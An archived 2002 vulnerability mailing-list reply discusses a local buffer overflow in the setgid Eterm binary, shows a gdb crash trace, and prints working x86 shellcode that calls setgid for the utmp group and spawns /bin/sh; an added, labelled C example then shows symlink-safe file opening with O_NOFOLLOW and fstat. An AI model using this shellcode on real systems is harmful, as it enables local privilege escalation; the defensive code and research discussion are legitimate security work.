Vulnerability Development mailing list archives

Re: Eterm SGID utmp Buffer Overflow (Local)


From: Charles 'core' Stevenson <core () bokeoa com>
Date: Tue, 15 Jan 2002 02:32:30 -0700

Simon 'corecode' Schubert wrote:
> > I found this last night looking for suids to overflow.  Tested on
> > Debian PowerPC Unstable. Yields gid utmp from which higher privileges
> > could be gained with a little effort. I haven't looked too close but I
> > think the overflow might be in imlib2.
> 
> could this be sploited under x86 as well?
> i don't see a way but this doesn't say anything... what do others say?

I'm not getting anywhere with it on x86 as far as the overflow goes.
There may be other problems... it looks in $HOME/.loaders/image so it's
possible there could be symlink attacks etc..

Program received signal SIGSEGV, Segmentation fault.
0x400b63ca in __imlib_ListLoaders () from /usr/lib/libImlib2.so.1
(gdb) bt
#0  0x400b63ca in __imlib_ListLoaders () from /usr/lib/libImlib2.so.1
#1  0x41414141 in ?? ()
Cannot access memory at address 0x41414141

Here's a modified version of Aleph One's execve /bin/sh that does setgid
utmp. Might be useful to someone.

char shellcode[] =
/* setgid(43) utmp on Debian */
"\x6a\x2b" /*  80483e0:       6a 2b                   push   $0x2b */
"\x5b"     /*  80483e2:       5b                      pop    %ebx  */
"\x6a\x2e" /*  80483e3:       6a 2e                   push   $0x2e */
"\x58"     /*  80483e5:       58                      pop    %eax  */
"\xcd\x80" /*  80483e6:       cd 80                   int    $0x80 */
/* execve /bin/sh by Aleph One */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";


Best Regards,
Charles Stevenson

> cheerz
>   corecode
> 
> --
> /"\   http://corecode.ath.cx/
> \ /
>  \     ASCII Ribbon Campaign
> / \  Against HTML Mail and News
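Added example, not from this thread and not Eterm or Imlib2 code: the post notes that the SGID binary reads from $HOME/.loaders/image, a user-controlled location where a symlink could redirect a privileged read. The defensive pattern for that is to open with O_NOFOLLOW and then inspect the descriptor you actually got with fstat (regular file, owned by the real uid, not writable by others) rather than stat'ing the path first, which would leave a race between the check and the open. The fixture paths and function names below are hypothetical and exist only so the example runs stand-alone.

```c
/* Added example (not from the thread): hardened open() for a file that a
 * setgid/setuid program reads from a user-controlled directory such as
 * $HOME/.loaders/image.  Paths, names and fixtures are hypothetical. */
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define PATH_BUF 256

/* Open a user-supplied path read-only without following a symlink at the
 * final component, then validate the object actually opened.
 * Returns an fd >= 0 on success, -1 with errno set on refusal. */
int open_user_file_safely(const char *path)
{
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NOCTTY | O_CLOEXEC);
    if (fd < 0)
        return -1;                  /* ELOOP here: a symlink was refused */

    struct stat st;
    if (fstat(fd, &st) != 0) {      /* check the fd, not the path: no race */
        close(fd);
        return -1;
    }
    if (!S_ISREG(st.st_mode) ||              /* no devices, FIFOs, dirs   */
        st.st_uid != getuid() ||             /* owned by the real caller  */
        (st.st_mode & (S_IWGRP | S_IWOTH)) || /* not writable by others   */
        st.st_nlink != 1) {                  /* not a hard-linked alias   */
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Constructed fixture under /tmp: a regular file plus a symlink to it. */
static int make_fixture(char *dir, char *file, char *link)
{
    snprintf(dir, PATH_BUF, "/tmp/safeopen-demo-%ld", (long)getpid());
    snprintf(file, PATH_BUF, "%s/image", dir);
    snprintf(link, PATH_BUF, "%s/image-link", dir);
    if (mkdir(dir, 0700) != 0 && errno != EEXIST)
        return -1;
    int fd = open(file, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0)
        return -1;
    if (write(fd, "loader config\n", 14) < 0) { close(fd); return -1; }
    close(fd);
    unlink(link);                   /* stale link from an earlier run */
    return symlink(file, link);
}

static void remove_fixture(const char *dir, const char *file, const char *link)
{
    unlink(link);
    unlink(file);
    rmdir(dir);
}

/* 1 if the genuine regular file opens through the hardened path, else 0. */
int demo_regular_file_accepted(void)
{
    char dir[PATH_BUF], file[PATH_BUF], link[PATH_BUF];
    if (make_fixture(dir, file, link) != 0)
        return 0;
    int fd = open_user_file_safely(file);
    int ok = (fd >= 0);
    if (ok)
        close(fd);
    remove_fixture(dir, file, link);
    return ok;
}

/* 1 if the symlink is refused with ELOOP (O_NOFOLLOW doing its job), else 0. */
int demo_symlink_rejected(void)
{
    char dir[PATH_BUF], file[PATH_BUF], link[PATH_BUF];
    if (make_fixture(dir, file, link) != 0)
        return 0;
    int fd = open_user_file_safely(link);
    int rejected = (fd < 0 && errno == ELOOP);
    if (fd >= 0)
        close(fd);
    remove_fixture(dir, file, link);
    return rejected;
}

int main(void)
{
    printf("regular file accepted: %d\n", demo_regular_file_accepted());
    printf("symlink rejected:      %d\n", demo_symlink_rejected());
    return 0;
}
```

O_NOFOLLOW only guards the last path component; a symlinked parent directory (for instance `~/.loaders` itself) is still followed, so a privileged program that must trust nothing under $HOME walks the path with openat() and O_NOFOLLOW one component at a time, or drops its elevated group with setgid() before touching user files at all.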


